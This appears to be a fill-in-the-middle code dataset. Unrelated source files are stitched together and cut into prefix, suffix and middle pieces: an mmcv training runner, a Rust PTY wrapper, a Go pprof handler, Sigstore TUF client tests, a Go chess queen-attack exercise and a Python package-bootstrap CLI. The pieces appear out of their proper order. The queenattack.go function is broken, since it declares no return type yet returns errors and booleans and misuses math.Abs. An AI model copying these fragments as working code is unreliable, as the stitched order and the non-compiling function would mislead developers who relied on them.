if self.with_wandb:
wandb.log({"CE val loss": sum(self.log_buffer.val_history['loss_deepsets_ce'])/
len(self.log_buffer.val_history['loss_deepsets_ce']),
"val ds_acc": sum(self.log_buffer.val_history['ds_acc'])/
len(self.log_buffer.val_history['ds_acc']),
"val iou_error": sum(self.log_buffer.val_history['iou_error'])/len(self.log_buffer.val_history['iou_error']),
"val max score predictions": sum(self.log_buffer.val_history['ds_pred_on_max'])/
len(self.log_buffer.val_history['ds_pred_on_max'])
})
else: # single gpu
if self.with_wandb:
wandb.log({"CE val loss": sum(self.log_buffer.val_history['loss_deepsets_ce']) /
len(self.log_buffer.val_history['loss_deepsets_ce']),
"val ds_acc": sum(self.log_buffer.val_history['ds_acc']) /
len(self.log_buffer.val_history['ds_acc']),
"val iou_error": sum(self.log_buffer.val_history['iou_error']) / len(
self.log_buffer.val_history['iou_error']),
"val max score predictions": sum(self.log_buffer.val_history['ds_pred_on_max']) /
len(self.log_buffer.val_history['ds_pred_on_max'])})
def run(self, data_loaders, workflow, max_epochs=None, **kwargs):
"""Start running.
Args:
data_loaders (list[:obj:`DataLoader`]): Dataloaders for training
and validation.
workflow (list[tuple]): A list of (phase, epochs) to specify the
running order and epochs. E.g, [('train', 2), ('val', 1)] means
running 2 epochs for training and 1 epoch for validation,
iteratively.
"""
assert isinstance(data_loaders, list)
assert mmcv.is_list_of(workflow, tuple)
assert len(data_loaders) == len(workflow)
if max_epochs is not None:
warnings.warn(
'setting max_epochs in run is deprecated, '
'please set max_epochs in runner_config', DeprecationWarning)
self._max_epochs = max_epochs
assert self._max_epochs is not None, (
'max_epochs must be specified during instantiation')
for i, flow in enumerate(workflow):
mode, epochs = flow
if mode == 'train':
self._max_iters = self._max_epochs * len(data_loaders[i])
break
work_dir = self.work_dir if self.work_dir is not None else 'NONE'
self.logger.info('Start running, host: %s, work_dir: %s',
get_host_info(), work_dir)
self.logger.info('Hooks will be executed in the following order:\n%s',
self.get_hook_info())
self.logger.info('workflow: %s, max: %d epochs', workflow,
self._max_epochs)
self.call_hook('before_run')
while self.epoch < self._max_epochs:
for i, flow in enumerate(workflow):
mode, epochs = flow
if isinstance(mode, str): # self.train()
if not hasattr(self, mode):
raise ValueError(
f'runner has no method named "{mode}" to run an '
'epoch')
epoch_runner = getattr(self, mode)
else:
raise TypeError(
'mode in workflow must be a str, but got {}'.format(
type(mode)))
for _ in range(epochs):
if mode == 'train' and self.epoch >= self._max_epochs:
break
epoch_runner(data_loaders[i], **kwargs)
time.sleep(1) # wait for some hooks like loggers to finish
self.call_hook('after_run')
def save_checkpoint(self,
out_dir,
filename_tmpl='end2end_epoch_{}.pth',
save_optimizer=True,
meta=None,
create_symlink=True):
"""Save the checkpoint.
Args:
out_dir (str): The directory that checkpoints are saved.
filename_tmpl (str, optional): The checkpoint filename template,
which contains a placeholder for the epoch number.
Defaults to 'epoch_{}.pth'.
save_optimizer (bool, optional): Whether to save the optimizer to
the checkpoint. Defaults to True.
meta (dict, optional): The meta information to be saved in the
checkpoint. Defaults to None.
create_symlink (bool, optional): Whether to create a symlink
"latest.pth" to point to the latest checkpoint.
Defaults to True.
"""
if meta is None:
meta = {}
elif not isinstance(meta, dict):
raise TypeError(
f'meta should be a dict or None, but got {type(meta)}')
if self.meta is not None:
meta.update(self.meta)
# Note: meta.update(self.meta) should be done before
# meta.update(epoch=self.epoch + 1, iter=self.iter) otherwise
# there will be problems with resumed checkpoints.
# More details in https://github.com/open-mmlab/mmcv/pull/1108
meta.update(epoch=self.epoch + 1, iter=self.iter)
filename = filename_tmpl.format(self.epoch + 1)
filepath = osp.join(out_dir, filename)
optimizer = self.optimizer if save_optimizer else None
save_checkpoint(self.model, filepath, optimizer=optimizer, meta=meta)
# in some environments, `os.symlink` is not supported, you may need to
# set `create_symlink` to False
if create_symlink:
dst_file = osp.join(out_dir, 'latest.pth')
if platform.system() != 'Windows':
mmcv.symlink(filename, dst_file)
else:
shutil.copy(filepath, dst_file)
# @RUNNERS.register_module()
# class Runner(MyRunner):
# """Deprecated name of EpochBasedRunner."""
#
# def __init__(self, *args, **kwargs):
# warnings.warn(
# 'Runner was deprecated, please use EpochBasedRunner instead',
# DeprecationWarning)
# super().__init__(*args, **kwargs) | self._iter += 1
self.call_hook('after_train_epoch')
self._epoch += 1 |
output_string.go | package armtemplate |
||
pty.rs | use nix::errno::Errno;
use nix::fcntl::{open, OFlag};
use nix::pty::{grantpt, posix_openpt, ptsname, unlockpt, PtyMaster};
use nix::sys::epoll::{epoll_create, epoll_ctl, epoll_wait, EpollEvent, EpollFlags, EpollOp};
use nix::sys::stat::Mode;
use nix::sys::termios;
use nix::unistd::{close, dup2, read, setsid, write};
use std::cmp::min;
use std::convert::TryInto;
use std::io;
use std::os::unix::io::AsRawFd;
use std::os::unix::io::RawFd;
use std::os::unix::process::CommandExt;
use std::path::Path;
use std::process::Command;
use std::time::{Duration, Instant};
use crate::filter::Filter;
// Check at .1 / .5 / 2.5 / 12.5 / .... / 60 seconds
const MIN_CHECK_INTERVAL: std::time::Duration = Duration::from_millis(100);
const MAX_CHECK_INTERVAL: std::time::Duration = Duration::from_secs(60);
const CHECK_INTERVAL_MULTIPLIER: u32 = 5;
const STDIN: RawFd = 0;
const STDOUT: RawFd = 1;
struct RawInput {
orig_attr: termios::Termios,
}
impl RawInput {
fn setup() -> nix::Result<RawInput> {
let orig_attr = termios::tcgetattr(0)?;
let mut new_attr = orig_attr.clone();
termios::cfmakeraw(&mut new_attr);
termios::tcsetattr(0, termios::SetArg::TCSAFLUSH, &new_attr)?;
Ok(RawInput { orig_attr })
}
}
impl Drop for RawInput {
fn drop(&mut self) {
if let Err(e) = termios::tcsetattr(0, termios::SetArg::TCSAFLUSH, &self.orig_attr) {
println!("Can't restore terminal settings: {}", e);
}
}
}
fn write_all(fd: RawFd, buf: &[u8]) -> nix::Result<()> {
let mut written = 0;
while written < buf.len() {
match write(fd, &buf[written..]) {
Ok(write_count) => written += write_count,
Err(nix::Error::Sys(Errno::EINTR)) => {}
Err(e) => return Err(e),
}
}
Ok(())
}
struct Buffer {
buf: Vec<u8>,
count: usize,
}
impl Buffer {
fn new() -> Self {
return Buffer {
buf: vec![0; 4096],
count: 0,
};
}
fn fill(&mut self, fd: RawFd) -> nix::Result<bool> {
match read(fd, &mut self.buf[self.count..]) {
Ok(0) => Ok(false),
Ok(count) => {
self.count += count;
Ok(true)
}
Err(e) => Err(e),
}
}
fn flush(&mut self, fd: RawFd) -> nix::Result<()> {
write_all(fd, &self.buf[0..self.count])?;
self.count = 0;
Ok(())
}
}
struct FilteredBuffer {
raw: Buffer,
filter: Filter,
}
impl FilteredBuffer {
fn new() -> Self {
return FilteredBuffer {
raw: Buffer::new(),
filter: Filter::new(),
};
}
fn fill(&mut self, fd: RawFd) -> nix::Result<bool> {
if !self.raw.fill(fd)? {
return Ok(false);
}
self.filter.fill(&self.raw.buf[0..self.raw.count]);
self.raw.count = 0;
Ok(true)
}
fn flush(&mut self, fd: RawFd) -> nix::Result<()> {
{
let buf = self.filter.buffer();
write_all(fd, buf)?;
}
self.filter.clear_buffer();
Ok(())
}
}
pub struct Pty {
master_fd: PtyMaster,
peer_fd: RawFd,
check_interval: Duration,
last_check_time: Option<Instant>,
}
impl Pty {
pub fn new() -> nix::Result<Pty> {
// Open a new PTY master
let master_fd = posix_openpt(OFlag::O_RDWR)?;
// Allow a slave to be generated for it
grantpt(&master_fd)?;
unlockpt(&master_fd)?;
// Get the name of the slave
let peer_name = unsafe { ptsname(&master_fd) }?;
// Try to open the slave
let peer_fd = open(Path::new(&peer_name), OFlag::O_RDWR, Mode::empty())?;
Ok(Pty {
master_fd,
peer_fd,
check_interval: MIN_CHECK_INTERVAL,
last_check_time: None,
})
}
fn child_setup(peer_fd: RawFd) -> nix::Result<()> {
dup2(peer_fd, 0)?;
dup2(peer_fd, 1)?;
dup2(peer_fd, 2)?;
setsid()?;
Ok(())
}
fn close_peer_fd(&mut self) -> nix::Result<()> {
if self.peer_fd != -1 {
let res = close(self.peer_fd);
self.peer_fd = -1;
res
} else {
Ok(())
}
}
pub fn fork(&mut self) -> io::Result<u32> {
let mut proc = Command::new("/bin/bash");
let peer_fd = self.peer_fd;
unsafe {
proc.pre_exec(move || match Self::child_setup(peer_fd) {
Ok(()) => Ok(()),
Err(nix::Error::Sys(e)) => return Err(e.into()),
Err(e) => {
return Err(io::Error::new(
io::ErrorKind::Other,
format!("Spawn failed: {}", e),
))
} | let child = proc.spawn()?;
self.close_peer_fd().unwrap();
Ok(child.id())
}
fn maybe_check<A>(&mut self, actions: &mut A, from_child: &mut FilteredBuffer) -> Duration
where
A: PtyActions,
{
let now = Instant::now();
let next_check_time = if let Some(last_check_time) = self.last_check_time {
last_check_time + self.check_interval
} else {
now
};
if next_check_time <= now {
actions.check();
let in_window_title = from_child.filter.in_window_title();
let out_window_title = actions.make_window_title(in_window_title);
from_child.filter.set_out_window_title(&out_window_title);
let _ = from_child.flush(STDOUT);
self.check_interval = min(
MAX_CHECK_INTERVAL,
self.check_interval * CHECK_INTERVAL_MULTIPLIER,
);
self.last_check_time = Some(now);
self.check_interval
} else {
next_check_time - now
}
}
pub fn handle<A>(&mut self, actions: &mut A) -> nix::Result<()>
where
A: PtyActions,
{
let raw_input = RawInput::setup();
if let Err(e) = raw_input {
println!("Can't setup raw input: {}", e);
};
let master_fd = self.master_fd.as_raw_fd();
let epoll_fd = epoll_create()?;
let mut from_child = FilteredBuffer::new();
let mut to_child = Buffer::new();
let mut event = EpollEvent::new(EpollFlags::EPOLLIN, 0);
epoll_ctl(epoll_fd, EpollOp::EpollCtlAdd, master_fd, &mut event)?;
let mut event = EpollEvent::new(EpollFlags::EPOLLIN, 1);
epoll_ctl(epoll_fd, EpollOp::EpollCtlAdd, STDIN, &mut event)?;
let mut events = vec![EpollEvent::empty(), EpollEvent::empty()];
let mut done = false;
while !done {
let remaining = self.maybe_check(actions, &mut from_child);
let event_count = epoll_wait(
epoll_fd,
&mut events,
remaining.as_millis().try_into().unwrap(),
)?;
for event in &events[0..event_count] {
match event.data() {
0 => {
if event.events().contains(EpollFlags::EPOLLIN)
|| event.events().contains(EpollFlags::EPOLLHUP)
{
if from_child.fill(master_fd)? {
from_child.flush(STDOUT)?;
self.check_interval = MIN_CHECK_INTERVAL;
} else {
done = true;
}
}
}
1 => {
if event.events().contains(EpollFlags::EPOLLIN)
|| event.events().contains(EpollFlags::EPOLLHUP)
{
if to_child.fill(STDIN)? {
to_child.flush(master_fd)?;
} else {
done = true;
}
}
}
_ => (),
}
}
}
return Ok(());
}
}
impl Drop for Pty {
fn drop(&mut self) {
self.close_peer_fd().unwrap();
}
}
pub trait PtyActions {
fn check(&mut self);
fn make_window_title(&self, in_window_title: &str) -> String {
return in_window_title.to_string();
}
} | });
}
|
pprof.go | package code
import (
"net/http"
_ "net/http/pprof"
"strings"
ice "github.com/shylinux/icebergs"
"github.com/shylinux/icebergs/base/aaa"
"github.com/shylinux/icebergs/base/cli"
"github.com/shylinux/icebergs/base/mdb"
"github.com/shylinux/icebergs/base/nfs"
"github.com/shylinux/icebergs/base/tcp"
"github.com/shylinux/icebergs/base/web"
kit "github.com/shylinux/toolkits"
)
const (
BINNARY = "binnary"
SERVICE = "service"
SECONDS = "seconds"
)
const PPROF = "pprof"
func init() | {
Index.Merge(&ice.Context{
Configs: map[string]*ice.Config{
PPROF: {Name: PPROF, Help: "性能分析", Value: kit.Data(kit.MDB_SHORT, kit.MDB_ZONE,
PPROF, []string{GO, "tool", PPROF},
)},
},
Commands: map[string]*ice.Command{
"/pprof/": {Name: "/pprof/", Help: "性能分析", Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.R.URL.Path = strings.Replace("/code"+m.R.URL.Path, "code", "debug", 1)
http.DefaultServeMux.ServeHTTP(m.W, m.R)
m.Render(ice.RENDER_VOID)
}},
PPROF: {Name: "pprof zone id auto create", Help: "性能分析", Action: map[string]*ice.Action{
mdb.CREATE: {Name: "create zone=some binnary service seconds=3", Help: "创建", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.INSERT, PPROF, "", mdb.HASH, arg)
}},
mdb.INSERT: {Name: "insert zone type name text", Help: "插入", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.INSERT, PPROF, "", mdb.HASH, kit.MDB_ZONE, arg[1])
m.Cmdy(mdb.INSERT, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE), arg[2:])
}},
mdb.MODIFY: {Name: "modify", Help: "编辑", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.MODIFY, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE), m.Option(kit.MDB_ID), arg)
}},
mdb.REMOVE: {Name: "remove", Help: "删除", Hand: func(m *ice.Message, arg ...string) {
m.Cmdy(mdb.DELETE, PPROF, "", mdb.HASH, m.OptionSimple(kit.MDB_ZONE))
}},
mdb.INPUTS: {Name: "inputs", Help: "补全", Hand: func(m *ice.Message, arg ...string) {
switch arg[0] {
case BINNARY:
m.Cmd(nfs.DIR, "bin/", "path,size,time").Table(func(index int, value map[string]string, head []string) {
m.Push(BINNARY, value["path"])
m.Push("", value, []string{"size,time"})
})
case SERVICE:
m.Cmd(web.SPIDE).Table(func(index int, value map[string]string, head []string) {
m.Push(SERVICE, kit.MergeURL2(value["client.url"], "/debug/pprof/profile"))
})
}
}},
cli.RUN: {Name: "run", Help: "执行", Hand: func(m *ice.Message, arg ...string) {
msg := m.Cmd(web.SPIDE, web.SPIDE_DEV, web.SPIDE_CACHE, web.SPIDE_GET, m.Option(SERVICE), SECONDS, m.Option(SECONDS))
cmd := kit.Simple(m.Confv(PPROF, kit.Keym(PPROF)), "-text", m.Option(BINNARY), msg.Append(kit.MDB_FILE))
res := strings.Split(m.Cmdx(cli.SYSTEM, cmd), ice.MOD_NL)
if len(res) > 20 {
res = res[:20]
}
m.Cmd(mdb.INSERT, PPROF, "", mdb.ZONE, m.Option(kit.MDB_ZONE),
kit.MDB_TEXT, strings.Join(res, ice.MOD_NL), kit.MDB_FILE, msg.Append(kit.MDB_FILE))
m.Echo(strings.Join(res, ice.MOD_NL))
m.ProcessInner()
}},
web.SERVE: {Name: "serve", Help: "展示", Hand: func(m *ice.Message, arg ...string) {
u := kit.ParseURL(m.Option(ice.MSG_USERWEB))
p := u.Hostname() + ":" + m.Cmdx(tcp.PORT, aaa.RIGHT)
m.Cmd(cli.DAEMON, m.Confv(PPROF, kit.Keym(PPROF)), "-http="+p, m.Option(BINNARY), m.Option(kit.MDB_FILE))
m.Echo("http://%s/ui/top", p)
m.ProcessInner()
}},
}, Hand: func(m *ice.Message, c *ice.Context, cmd string, arg ...string) {
m.Fields(len(arg), "time,zone,count,binnary,service,seconds", "time,id,text,file")
if m.Cmdy(mdb.SELECT, PPROF, "", mdb.ZONE, arg); len(arg) == 0 {
m.PushAction(cli.RUN, mdb.REMOVE)
return
}
m.Table(func(index int, value map[string]string, head []string) {
m.PushDownload(kit.MDB_LINK, "pprof.pd.gz", value[kit.MDB_FILE])
m.PushButton(web.SERVE)
})
}},
},
})
}
|
|
client_test.go | //
// Copyright 2021 The Sigstore Authors.
//
// Licensed under the Apache License, Version 2.0 (the "License");
// you may not use this file except in compliance with the License.
// You may obtain a copy of the License at
//
// http://www.apache.org/licenses/LICENSE-2.0
//
// Unless required by applicable law or agreed to in writing, software
// distributed under the License is distributed on an "AS IS" BASIS,
// WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
// See the License for the specific language governing permissions and
// limitations under the License.
package tuf
import (
"bytes"
"context"
"encoding/json"
"io/ioutil"
"net/http"
"net/http/httptest"
"os"
"path/filepath"
"reflect"
"sort"
"strings"
"testing"
"time"
"github.com/google/go-cmp/cmp"
"github.com/google/go-cmp/cmp/cmpopts"
"github.com/theupdateframework/go-tuf"
"github.com/theupdateframework/go-tuf/data"
"github.com/theupdateframework/go-tuf/verify"
)
var targets = []string{
"artifact.pub",
"fulcio.crt.pem",
"fulcio_v1.crt.pem",
"ctfe.pub",
"rekor.pub",
}
func TestNewFromEnv(t *testing.T) {
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
ctx := context.Background()
// Make sure nothing is expired
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
// Now try with expired targets
forceExpiration(t, true)
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
tuf.Close()
checkTargetsAndMeta(t, tuf)
if err := Initialize(ctx, DefaultRemoteRoot, nil); err != nil |
if l := dirLen(t, td); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
// And go from there!
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
}
func TestNoCache(t *testing.T) {
ctx := context.Background()
// Once more with NO_CACHE
t.Setenv("SIGSTORE_NO_CACHE", "true")
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
// Force expiration so we have some content to download
forceExpiration(t, true)
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
checkTargetsAndMeta(t, tuf)
tuf.Close()
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
}
func TestCache(t *testing.T) {
ctx := context.Background()
// Once more with NO_CACHE
t.Setenv("SIGSTORE_NO_CACHE", "false")
td := t.TempDir()
t.Setenv("TUF_ROOT", td)
// Make sure nothing is in that directory to start with
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
// Nothing should get downloaded if everything is up to date
forceExpiration(t, false)
tuf, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
tuf.Close()
if l := dirLen(t, td); l != 0 {
t.Errorf("expected no filesystem writes, got %d entries", l)
}
// Force expiration so that content gets downloaded. This should write to disk
forceExpiration(t, true)
tuf, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
tuf.Close()
if l := dirLen(t, td); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
checkTargetsAndMeta(t, tuf)
}
func TestCustomRoot(t *testing.T) {
ctx := context.Background()
// Create a remote repository.
td := t.TempDir()
remote, r := newTufRepo(t, td, "foo")
// Serve remote repository.
s := httptest.NewServer(http.FileServer(http.Dir(filepath.Join(td, "repository"))))
defer s.Close()
// Initialize with custom root.
tufRoot := t.TempDir()
t.Setenv("TUF_ROOT", tufRoot)
meta, err := remote.GetMeta()
if err != nil {
t.Error(err)
}
rootBytes, ok := meta["root.json"]
if !ok {
t.Error(err)
}
if err := Initialize(ctx, s.URL, rootBytes); err != nil {
t.Error(err)
}
if l := dirLen(t, tufRoot); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
// Successfully get target.
tufObj, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
if b, err := tufObj.GetTarget("foo.txt"); err != nil || !bytes.Equal(b, []byte("foo")) {
t.Fatal(err)
}
tufObj.Close()
// Force expiration on the first timestamp and internal go-tuf verification.
forceExpirationVersion(t, 1)
oldIsExpired := verify.IsExpired
verify.IsExpired = func(time time.Time) bool {
return true
}
if _, err = NewFromEnv(ctx); err == nil {
t.Errorf("expected expired timestamp from the remote")
}
// Let internal TUF verification succeed normally now.
verify.IsExpired = oldIsExpired
// Update remote targets, issue a timestamp v2.
updateTufRepo(t, td, r, "foo1")
// Use newTuf and successfully get updated metadata using the cached remote location.
tufObj, err = NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
if b, err := tufObj.GetTarget("foo.txt"); err != nil || !bytes.Equal(b, []byte("foo1")) {
t.Fatal(err)
}
tufObj.Close()
}
func TestGetTargetsByMeta(t *testing.T) {
ctx := context.Background()
// Create a remote repository.
td := t.TempDir()
remote, _ := newTufCustomRepo(t, td, "foo")
// Serve remote repository.
s := httptest.NewServer(http.FileServer(http.Dir(filepath.Join(td, "repository"))))
defer s.Close()
// Initialize with custom root.
tufRoot := t.TempDir()
t.Setenv("TUF_ROOT", tufRoot)
meta, err := remote.GetMeta()
if err != nil {
t.Error(err)
}
rootBytes, ok := meta["root.json"]
if !ok {
t.Error(err)
}
if err := Initialize(ctx, s.URL, rootBytes); err != nil {
t.Error(err)
}
if l := dirLen(t, tufRoot); l == 0 {
t.Errorf("expected filesystem writes, got %d entries", l)
}
tufObj, err := NewFromEnv(ctx)
if err != nil {
t.Fatal(err)
}
defer tufObj.Close()
// Fetch a target with no custom metadata.
targets, err := tufObj.GetTargetsByMeta(UnknownUsage, []string{"fooNoCustom.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 1 {
t.Fatalf("expected one target without custom metadata, got %d targets", len(targets))
}
if !bytes.Equal(targets[0].Target, []byte("foo")) {
t.Fatalf("target metadata mismatched, expected: %s, got: %s", "foo", string(targets[0].Target))
}
if targets[0].Status != Active {
t.Fatalf("target without custom metadata not active, got: %v", targets[0].Status)
}
// Fetch multiple targets with no custom metadata.
targets, err = tufObj.GetTargetsByMeta(UnknownUsage, []string{"fooNoCustom.txt", "fooNoCustomOther.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 2 {
t.Fatalf("expected two targets without custom metadata, got %d targets", len(targets))
}
if targets[0].Status != Active || targets[1].Status != Active {
t.Fatalf("target without custom metadata not active, got: %v and %v", targets[0].Status, targets[1].Status)
}
// Fetch targets with custom metadata.
targets, err = tufObj.GetTargetsByMeta(Fulcio, []string{"fooNoCustom.txt"})
if err != nil {
t.Fatal(err)
}
if len(targets) != 2 {
t.Fatalf("expected two targets without custom metadata, got %d targets", len(targets))
}
targetBytes := []string{string(targets[0].Target), string(targets[1].Target)}
expectedTB := []string{"foo", "foo"}
if !reflect.DeepEqual(targetBytes, expectedTB) {
t.Fatalf("target metadata mismatched, expected: %v, got: %v", expectedTB, targetBytes)
}
targetStatuses := []StatusKind{targets[0].Status, targets[1].Status}
sort.Slice(targetStatuses, func(i, j int) bool {
return targetStatuses[i] < targetStatuses[j]
})
expectedTS := []StatusKind{Active, Expired}
if !reflect.DeepEqual(targetStatuses, expectedTS) {
t.Fatalf("unexpected target status with custom metadata, expected %v, got: %v", expectedTS, targetStatuses)
}
// Error when fetching target that does not exist.
_, err = tufObj.GetTargetsByMeta(UsageKind(UnknownStatus), []string{"unknown.txt"})
expectedErr := "file not found: unknown.txt"
if !strings.Contains(err.Error(), "file not found: unknown.txt") {
t.Fatalf("unexpected error fetching missing metadata, expected: %s, got: %s", expectedErr, err.Error())
}
}
func checkTargetsAndMeta(t *testing.T, tuf *TUF) {
// Check the targets
t.Helper()
for _, target := range targets {
if _, err := tuf.GetTarget(target); err != nil {
t.Fatal(err)
}
}
// An invalid target
if _, err := tuf.GetTarget("invalid"); err == nil {
t.Error("expected error reading target, got nil")
}
// Check root status matches
status, err := tuf.getRootStatus()
if err != nil {
t.Fatal(err)
}
if !cmp.Equal(targets, status.Targets,
cmpopts.SortSlices(func(a, b string) bool { return a < b })) {
t.Errorf("mismatched targets, expected %s, got %s", targets, status.Targets)
}
}
func dirLen(t *testing.T, td string) int {
t.Helper()
de, err := os.ReadDir(td)
if err != nil {
t.Fatal(err)
}
return len(de)
}
func forceExpiration(t *testing.T, expire bool) {
oldIsExpiredTimestamp := isExpiredTimestamp
isExpiredTimestamp = func(_ []byte) bool {
return expire
}
t.Cleanup(func() {
isExpiredTimestamp = oldIsExpiredTimestamp
})
}
func forceExpirationVersion(t *testing.T, version int) {
oldIsExpiredTimestamp := isExpiredTimestamp
isExpiredTimestamp = func(metadata []byte) bool {
s := &data.Signed{}
if err := json.Unmarshal(metadata, s); err != nil {
return true
}
sm := &data.Timestamp{}
if err := json.Unmarshal(s.Signed, sm); err != nil {
return true
}
return sm.Version <= version
}
t.Cleanup(func() {
isExpiredTimestamp = oldIsExpiredTimestamp
})
}
// newTufCustomRepo initializes a TUF repository with root, targets, snapshot, and timestamp roles
// 4 targets are created to exercise various code paths, including two targets with no custom metadata,
// one target with custom metadata marked as active, and another with custom metadata marked as expired.
func newTufCustomRepo(t *testing.T, td string, targetData string) (tuf.LocalStore, *tuf.Repo) {
scmActive, err := json.Marshal(&sigstoreCustomMetadata{Sigstore: customMetadata{Usage: Fulcio, Status: Active}})
if err != nil {
t.Error(err)
}
scmExpired, err := json.Marshal(&sigstoreCustomMetadata{Sigstore: customMetadata{Usage: Fulcio, Status: Expired}})
if err != nil {
t.Error(err)
}
remote := tuf.FileSystemStore(td, nil)
r, err := tuf.NewRepo(remote)
if err != nil {
t.Error(err)
}
if err := r.Init(false); err != nil {
t.Error(err)
}
for _, role := range []string{"root", "targets", "snapshot", "timestamp"} {
if _, err := r.GenKey(role); err != nil {
t.Error(err)
}
}
for name, scm := range map[string]json.RawMessage{
"fooNoCustom.txt": nil, "fooNoCustomOther.txt": nil,
"fooActive.txt": scmActive, "fooExpired.txt": scmExpired} {
targetPath := filepath.Join(td, "staged", "targets", name)
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget(name, scm); err != nil {
t.Error(err)
}
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
return remote, r
}
func newTufRepo(t *testing.T, td string, targetData string) (tuf.LocalStore, *tuf.Repo) {
remote := tuf.FileSystemStore(td, nil)
r, err := tuf.NewRepo(remote)
if err != nil {
t.Error(err)
}
if err := r.Init(false); err != nil {
t.Error(err)
}
for _, role := range []string{"root", "targets", "snapshot", "timestamp"} {
if _, err := r.GenKey(role); err != nil {
t.Error(err)
}
}
targetPath := filepath.Join(td, "staged", "targets", "foo.txt")
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget("foo.txt", nil); err != nil {
t.Error(err)
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
return remote, r
}
func updateTufRepo(t *testing.T, td string, r *tuf.Repo, targetData string) {
targetPath := filepath.Join(td, "staged", "targets", "foo.txt")
if err := os.MkdirAll(filepath.Dir(targetPath), 0755); err != nil {
t.Error(err)
}
if err := ioutil.WriteFile(targetPath, []byte(targetData), 0600); err != nil {
t.Error(err)
}
if err := r.AddTarget("foo.txt", nil); err != nil {
t.Error(err)
}
if err := r.Snapshot(); err != nil {
t.Error(err)
}
if err := r.Timestamp(); err != nil {
t.Error(err)
}
if err := r.Commit(); err != nil {
t.Error(err)
}
}
| {
t.Error()
} |
queenattack.go | package queenattack
import (
"errors"
"math"
)
// QueenAttack determines whether two queens can attack each other in chess
func QueenAttack(posOne, posTwo string) {
if posOne == posTwo {
return errors.New("queens on same space")
} else if (posOne[0] == posTwo[0]) || (posOne[1] == posTwo[1]) {
return true
} else if posOne[0]-posTwo[0] == math.Abs(posOne[1]-posTwo[1]) |
return false
}
| {
return true
} |
commands.py | # -*- coding: utf-8 -*-
"""bootstrap_py.commands."""
import os
import sys
import re
import argparse
from bootstrap_py import control, __prog__, __version__
from bootstrap_py.update import Update
from bootstrap_py.exceptions import BackendFailure, Conflict
def setoption(parser, metadata=None):
"""Set argument parser option."""
parser.add_argument('-v', action='version',
version=__version__)
subparsers = parser.add_subparsers(help='sub commands help')
create_cmd = subparsers.add_parser('create')
create_cmd.add_argument('name',
help='Specify Python package name.')
create_cmd.add_argument('-d', dest='description', action='store',
help='Short description about your package.')
create_cmd.add_argument('-a', dest='author', action='store',
required=True,
help='Python package author name.')
create_cmd.add_argument('-e', dest='email', action='store',
required=True,
help='Python package author email address.')
create_cmd.add_argument('-l', dest='license',
choices=metadata.licenses().keys(),
default='GPLv3+',
help='Specify license. (default: %(default)s)')
create_cmd.add_argument('-s', dest='status',
choices=metadata.status().keys(),
default='Alpha',
help=('Specify development status. '
'(default: %(default)s)'))
create_cmd.add_argument('--no-check', action='store_true',
help='No checking package name in PyPI.')
create_cmd.add_argument('--with-samples', action='store_true',
help='Generate package with sample code.')
group = create_cmd.add_mutually_exclusive_group(required=True)
group.add_argument('-U', dest='username', action='store',
help='Specify GitHub username.')
group.add_argument('-u', dest='url', action='store', type=valid_url,
help='Python package homepage url.')
create_cmd.add_argument('-o', dest='outdir', action='store',
default=os.path.abspath(os.path.curdir),
help='Specify output directory. (default: $PWD)')
list_cmd = subparsers.add_parser('list')
list_cmd.add_argument('-l', dest='licenses', action='store_true',
help='show license choices.')
def valid_url(url):
"""Validate url.
:rtype: str
:return: url
:param str url: package homepage url.
"""
regex = re.compile(
r'^(?:http)s?://'
r'(?:(?:[A-Z0-9](?:[A-Z0-9-]{0,61}[A-Z0-9])?\.)+'
r'(?:[A-Z]{2,6}\.?|[A-Z0-9-]{2,}\.?))'
r'(?:/?|[/?]\S+)$', re.IGNORECASE)
if not regex.match(url):
raise argparse.ArgumentTypeError('"{0}" is invalid url.'.format(url))
return url
def parse_options(metadata):
|
def main():
"""Execute main processes."""
try:
pkg_version = Update()
if pkg_version.updatable():
pkg_version.show_message()
metadata = control.retreive_metadata()
parser = parse_options(metadata)
argvs = sys.argv
if len(argvs) <= 1:
parser.print_help()
sys.exit(1)
args = parser.parse_args()
control.print_licences(args, metadata)
control.check_repository_existence(args)
control.check_package_existence(args)
control.generate_package(args)
except (RuntimeError, BackendFailure, Conflict) as exc:
sys.stderr.write('{0}\n'.format(exc))
sys.exit(1)
